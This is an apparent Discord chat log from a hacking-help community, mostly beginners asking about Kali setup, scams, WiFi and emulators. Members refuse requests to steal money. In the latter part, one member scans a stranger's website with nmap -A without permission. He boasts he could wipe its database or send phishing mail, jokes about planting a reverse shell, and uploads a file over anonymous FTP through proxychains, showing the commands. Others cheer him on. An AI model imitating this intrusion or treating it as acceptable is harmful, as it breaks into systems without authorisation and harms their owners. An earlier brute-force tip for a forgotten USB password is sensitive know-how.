I just found a note-to-self email in my junk mail saying that I've been hacked.

It claims that I have Pegasus spyware on one of my devices.

#

I have Avast on my mobile.

neon raven
#

Sorry

chilly merlin
neon raven
raven wren
#

So how were they able to email me from my own account?

#

And I'm not replying to them.

neon raven
chilly merlin
#

No access to anything needed

#

Its a scam

neon raven
#

That's also a way

chilly merlin
inner notch
#

Hi everyone, I am new to Linux, I have installed kali on my laptop but there is an issue. I am unable to connect it to my second monitor. The laptop is an MSI Katana and it has two graphics cards, an intel and an nvidia and the output is HDMI. I have tried running all sorts of commands like xandr which did nothing and tried installing the drivers for both graphic cards, but for some reason, the 2nd monitor will still not pop up in the settings manager -> display menu. Has anyone encountered this issue before?

raven wren
desert torrent
#

You may also find it using screen -list

desert torrent
inner notch
#

thanks

tropic roost
#

hey guys...i need help ive been trying to configure whonix on kali virtualbox VM...and i doesnt connect to the gateway but whonix workstation does and ive tried everything including disabling all firewall rules on both machines but it aint working ...SOMEONE PLZ HELPšŸ˜­šŸ™šŸ»

chilly merlin
split moth
#

Trying to find the owner of this ip adress 173189134143

spiral notch
peak sundial
#

Hey I have a spare Rasberry pi left over from one of my school projects, I wanted to know of any useful projects I can do with my PI

lean loom
#

I have a usb encrypted with APFS can anybody help teach me to decrypt it as I forgot the password

lean loom
chilly merlin
lean loom
#

So basicly I encrypted a usb on my Mac a year ago and when I created the password I left 3 hints as its 3 parts. I know parts 1 and 3 but not 2. I was wondering if it would be possibly to brute force the usb using Kali Linux and a password list generator?

eager knot
#

it should be relatively easy

lean loom
#

Yeah that’s what I was thinking, only problem is my python skills are only at A level (uk education system) and iv run out of chat gpt uses for the day

eager knot
#

i'll give you a library that you can use to automate clicks and typing, it's called pyautogui

lean loom
#

thank you, should just be a case of finding something to create the world list then

eager knot
#

you can also manually create it too

#

but yes you can also do that automatically

#

you can use cewl in kali linux

#

that's a tool i'd know that generates custom wordlist

#

based off of input i think

lean loom
#

thank you fingers crossed it goes well

brittle musk
#

A girl friend got total acct info of couple but can’t withdraw off 100k help me…help me please

desert torrent
#

Hope this helps

halcyon flame
halcyon flame
brittle musk
#

Thank you Dazana. I’m a published author and was moving way too fast there. This is for fictional purposes, but thank you for bringing it to my attention. When I realized I had a resource for authentic material I shot off like a fully automatic rifle. I appreciate it, the last thing I want to do is misrepresent The Sect. I will stay aware of the fact that my actions reflect the group as a whole by my association moving forward. This type of guidance and the great examples of ethics and morals in a swift growing world is why I joined and respect The Sect and its members. Thank you again @desert torrent šŸ™šŸ¾

halcyon flame
#

Well, that's a new response, fair play

#

I'd be cautious asking things like that in public though

brittle musk
#

And thank you too @halcyon flame. Won’t happen again guys.

#

My pen name is Ma$k Twain$, I’ve been published out of the University of North Texas’s Mayborn NonFiction Literary Conference contest twice if we have any readers in the house BTW.

halcyon flame
#

If you're looking for insight, I'd just flat out ask, although I suppose you just got insight as to how ethical hacking communities react to such requests

brittle musk
#

#Facts

halcyon flame
#

Now I have an alternate reality version of Neuromancer, where Case is a hopeless pleb running around the Sprawl asking for people to break ice for him in my head

brittle musk
#

šŸ™„ what just went over my head

halcyon flame
#

Burned by Prime Energy, Case - a Skid - crawls through the underbelly of society, all doors closed, seeking for regained access to their grandmothers Instagram account

#

Neuromancer by William Gibson, check it out šŸ™‚ Excellent novel, and series of books

#

It's where the term "Cyberspace" was first coined IIRC

#

Ah, was in Burning Chrome the first appearance, another by Gibson

#
The term cyberspace first appeared in fiction in the 1980s in the work of cyberpunk science fiction author William Gibson, first in his 1982 short story "Burning Chrome" and later in his 1984 novel Neuromancer.[12] In the next few years, the word became prominently identified with online computer networks. The portion of Neuromancer cited in this respect is usually the following:[13]

Cyberspace. A consensual hallucination experienced daily by billions of legitimate operators, in every nation, by children being taught mathematical concepts... A graphic representation of data abstracted from the banks of every computer in the human system. Unthinkable complexity. Lines of light ranged in the nonspace of the mind, clusters and constellations of data. Like city lights, receding.
#

It touches on fictional security in a futuristic world, but Gibson honestly got so much right

#

..but above all is a freakin amazing story

#

Ok, brain dump done 🤣

shell sinew
#

@halcyon flame I need you...

halcyon flame
shell sinew
#

I think there's smth wrong with the module in HTB Academy (cuz I got the correct creds but rpd says I cannot log in)

halcyon flame
#

Please speak with support, I cannot help

shell sinew
#

oh okay

halcyon flame
#

If you can't login, then the creds are not correct, or you are missing something else

#

Sorry I can't be of more help.

shell sinew
#

nah they are 1000% correct

#

its ok, thx for response

halcyon flame
#

Note that it is like 0400 for a large portion of support staff, but they'll be back later in the day

shell sinew
#

run app as admin . . .

halcyon flame
#

Oh no

shell sinew
#

YEAAAA

halcyon flame
#

Well.. well done figuring it out šŸ˜„

shell sinew
#

2hrs for this... i'm done for today

halcyon flame
#

It happens

#

If you believe the module was at fault, please do feed back to us if you want

#

We do action it šŸ™‚

cold igloo
#

I keep getting error processing package going 3 samba configure ?

noble aurora
#

i have cryptography challenge can anyone help me with it its regarding aes-cbc

desert torrent
noble aurora
#

select the text and ctrl b

primal haven
#

@halcyon flame Need some help regarding some responsible disclosure..

halcyon flame
#

Sure, what's up?

primal haven
#

Thx for response, hope you dont mind if we move convo to dms

primal haven
halcyon flame
#

Sorry, discuss here, I don't accept DMs from those I don't know.

#

Happy to discuss it here

primal haven
#

Atleast guide me towards someone ethical and reputable LE personnel, if you dont mind.

#

Or if you could give a few minute on vc to me, thats also fine with me.

#

@halcyon flame

halcyon flame
#

Responsible disclosure isn't that complicated of a subject, what's the problem?

#

@primal haven

#

Besides, the conversation may be useful to others wondering about the subject themselves

#

If you can't name names, then don't, but I am happy to give advice about the subject.

primal haven
halcyon flame
#

And?

#

Either spit it out or don't, makes no difference to me

primal haven
primal haven
halcyon flame
#

Surely you can put your question forward without identifying either yourself or the party it's impacting?

#

LE personnel?

#

What is LE?

primal haven
#

law enforcement

halcyon flame
#

What..

#

Surely you know how to contact your authorities?

#

Ok, whatever.. I'm here to give advice if you want to describe your concern, again without any identifying information

#

If not, then also fine, all the best

#

I've just been trying to help, but I can't help without knowing the question or concern

#

If you're concerned about sharing something here, and will only share in DM, then it's likely it may be against #šŸ“œćƒ»rules, or something you should not be sharing with a random person on Discord.

#

Just my 2p

primal haven
halcyon flame
#

I'm afraid not, it's very late / early, and again I'd prefer speaking about it in text. If you don't want to speak about it here, that's fine, and I hope you find someone to speak with.

cunning robin
zinc phoenix
# cunning robin oh ok thanks man really apreciate that

ah yes i forgot to say my friend said there should be a study guide given to you since it was bit ago he doesnt remember well but his method was that he photocopied the stuff he wasnt too confident on and uploaded them to a tool called koodo reader which gave him a upper hand on understanding and highlighting and taking notes

primal haven
spiral notch
#

start learning opsec

#

and reset ur devices

#

then be cautious from then on

primal haven
zinc phoenix
#

@maiden charm give a look inside #

granite hound
#

i need some help

split moth
#

I've had an IP address logg in to multiple accounts on my phone. Trying to find out who it is, can I do that in here? 173189134143

eager knot
nova gale
#

I want to learn how to hack

#

I am only a beginner

spiral notch
#

j answered seriously too

nova gale
#

Can you teach me how to hack

#

I'm at my computer

eager knot
#

take a look at that channel

nova gale
#

Ok

nimble lintel
#

How can I make money ?

eager knot
spiral notch
#

HAHAHA

#

nice timing

nimble lintel
#

lol .

#

You’re right

nova gale
#

How do I steal money

#

Through cyber security

nimble lintel
#

Too said I have a broken femur so no working for next 9 months

spiral notch
#

Work from home

spiral notch
nova gale
#

But that's what hackers do they steal your credentials

spiral notch
#

We're not teaching you how to be a cybercriminal

nimble lintel
spiral notch
#

Neither do we wanna be liable for your shit

nova gale
#

And that's that's what I would like to learn

spiral notch
#

Started as an intern by 16

eager knot
nova gale
#

Me

nimble lintel
eager knot
#

yes

nova gale
#

18

spiral notch
spiral notch
eager knot
spiral notch
#

Especially don't wanna be liable for teaching someone who'll deffo get caught

eager knot
#

regardless of age

#

but i feel like at 18 you carry more responsibility with your action

nova gale
#

Age doesn't matter it's just a number

eager knot
#

and a jailcell is just a room

nova gale
#

But just because I'm 18 doesn't mean that I would not do it

spiral notch
nova gale
#

Bra

spiral notch
eager knot
spiral notch
#

I'm glad you admit to cybercrimes so easily

#

We're not gonna be liable for when u get caugjt

#

Thus we won't teach

#

Also have some morals

#

Will you?

nova gale
#

I want to hack the scammers computer

#

And I won't get caught

eager knot
#

ok

spiral notch
#

cuz you'll what, use nordvpn?

late flicker
#

#rules

#

#dontfollow

nova gale
#

Can I use any disc

timber belfry
nova gale
#

Anydesk

late flicker
nova gale
#

Can I use it

timber belfry
#

šŸ˜‚

neon raven
nova gale
#

šŸ˜‚šŸ˜‚šŸ˜‚

primal haven
supple grail
#

Cmon jro

steel raven
#

Hi does anyone know how to setup android emulator and run adb commands in kali ?

supple grail
#

You mean Kali nethunter?

steel raven
#

kali linux

#

I was trying to setup android studio inside kali linux

supple grail
#

Ooh

steel raven
#

was that a bad idea?

#

i just googled what nethunter is
didn't know it before

supple grail
#

i thought you meant running kali on a phone

#

my bad

steel raven
#

no worries

#

you can help?

#

I have windows 11,
I am having problems setting up hardware virtualization when I try to use sdk manager,
so I tried using a ARM based system image instead of x86_64

#

but then android studio gave the error that
can not run arm system when host is x86_64 🫠

#

then I tried using qenu something

minor blade
#
    2.    Open Task Manager → Performance Tab, check if Virtualization says ā€œEnabledā€.
    3.    If it’s off, reboot into BIOS and flip the switch for virtualization tech.
    4.    Back in Windows, make sure Hyper-V, Windows Hypervisor Platform, and Virtual Machine Platform are either all ON or all OFF depending on whether you’re using the built-in Android emulator or something like WSL2.
thorny sparrow
#

I have a request I have a 3.7V to 12V converter, Batteries, USB C port Small ON-OFF type button and batteries how to put it all together to work with CYD I have a version with USB C and micro port? the goal is to add a battery to the device thank you for your help because I am a beginner user

steel raven
#

and ig the server doesn't allow newbies to upload image I assume?

neon raven
brisk spoke
#

Is there anyone have an idea on how to retrieve a wifi password cause i has been hack, im just a student just recently learn coding right now so i have no idea about hacking

steel raven
brisk spoke
#

And then?

spiral notch
#

the password is writtein on the back usually

brisk spoke
#

And then reset tha router?

spiral notch
#

why owuld u wanna reset the router

brisk spoke
#

Because its being change tho

spiral notch
#

wdym

supple grail
#

maybe he thinks someone hacked his router

spiral notch
#

@supple grail @eager knot offtopic but holy shit i just scanned a skid's "black hat expert" website which has minimal entries and i got returned 119 lines of response with like 15 open ports including SSH, anonymouse ftp, smtp and unauthorized + outdated SQL

#

LOLL

#

his website is so easily hackable yet he pays for his own domain

brisk spoke
#

Im really have no idea what going on on my wifi i think its broken

spiral notch
#

then factory reset it or contact support

supple grail
spiral notch
#

smtp is an email serivce

#

i can use his server to send out phishing or malicious emails

#

or just create my own

supple grail
#

i know SSH is secure shell

spiral notch
#

with his own domain

#

then sql is a database, unauthorized means literally anyone can connect

#

i can just wipe his database

#

entirely

supple grail
#

where does one obtain this knowledge

spiral notch
#

huh wdym

#

knowledge of being able to secure a website so well 😭

supple grail
#

no like the typa stuff you know

spiral notch
#

im mostly into network pentesting

supple grail
#

neither do i 😭

spiral notch
#

but llike i just did some ctfs on hackthebox

#

hm

#

@supple grail i have access to his ftp

#

should i upload like a txt file

#

write sometihng to let him knoiw

spiral notch
#

file transfer protocol

#

basically access to the file storage of the server

supple grail
#

My discord crashed on laptop

supple grail
#

I don't understand how you can even like get access to ftp

brisk spoke
spiral notch
#

ftp <ip address>

supple grail
#

Oh

#

Wait you don't need a password?

spiral notch
#

not if he doesnt set it....

#

...he didnt set it

#

hmm lets see

#

the sql

#

database

supple grail
#

Wow, what a genius person

eager knot
#

this looks too good to be real

#

is it a honeypot

spiral notch
supple grail
#

who is it?

spiral notch
#

;#

solid gull
spiral notch
#

i dmed him i got a

#

competely legal

#

opportunity

#

to install a reverse shell on his system

#

waiting for reply

drowsy dock
brisk spoke
#

Shessh

spiral notch
#

hm

#

i shall leave

#

a message ;3

#

brb 2 mins

supple grail
#

did you just do something like nmap -sS <ip> to scan the site?

#

or was it something more complex

spiral notch
#

-A

brisk spoke
#

Can i learn i little from you bro @spiral notch 😁

spiral notch
#

most aggressive option in nmap

supple grail
#

oh

#

so he didnt even have a firewall

spiral notch
#

no

spiral notch
#

its rather how bad he is

#

also im a bad teacher

#

hm i should consider getting a whonix system fr

neon raven
spiral notch
#

im just adding a little file

#

into his database

brisk spoke
#

@spiral notch its ok I really want to know bad things too hehehe hpw about just give a piece of tools recommendations of kali linux that i can use to learn hacking like you

neon raven
#

🤣

supple grail
solid gull
neon raven
# supple grail Wait you don't need a password?

Well there are two types of login you can perform...
Null session
Do not require username or password
Guest session
Requires username but no password

And other is normal session.. Where both are required. ..

spiral notch
brisk spoke
spiral notch
#

ill give u advice on how to not be like him

#

perform an nmap -A scan on your ip address of any website or server you host

#

thatll save you a lot of headaches or breaches

neon raven
spiral notch
#

ok now

#

@supple grail

#

what do i name the file

#

youve_been_hacked.txt a bit too generic

supple grail
#

cooking_recipe.txt

spiral notch
#

LOL

brisk spoke
solid gull
supple grail
neon raven
peak sundial
spiral notch
peak sundial
#

That sounds nice, you know any resources I can go go to to start that?

spiral notch
#

@solid gull @supple grail

#

@eager knot

supple grail
#

yes?

spiral notch
#

omg

spiral notch
#

bot

#

hol

#

y

solid gull
#

Sniped

eager knot
#

oh i see it

solid gull
#

lol

eager knot
#

i have ven

#

lmao

#

good job on notifying him though

#

hopefully he will close the services from being publicly accessed

spiral notch
#
└─$ echo "hello, your system is pretty insecure, you should probably update some of your servers or use basic logins. I wish you the best of luck in your cybersecurity journey (btw you should probably not consider yourself a 'blackhat expert', its a little embarrassing \n- cute femboy hacker" > cooking_recipe.txt  

ā”Œā”€ā”€(kvts㉿owo)-[~]
└─$ proxychains ftp notgoodtoleak
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
#
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  notgoodtleak  ...  OK
Connected to notgoodtoleak.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 150 allowed.
220-Local time is now 10:24. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
Name (notgoodtoleak:kvts): anonymous
230 Anonymous user logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put cooking_recipe.txt```
#

ok finally

eager knot
#

also who tf enables anonymous login on their ftp

supple grail
#

maybe he likes guests

steel raven
eager knot
steel raven
eager knot
#

in host

#

there's no bios to your vm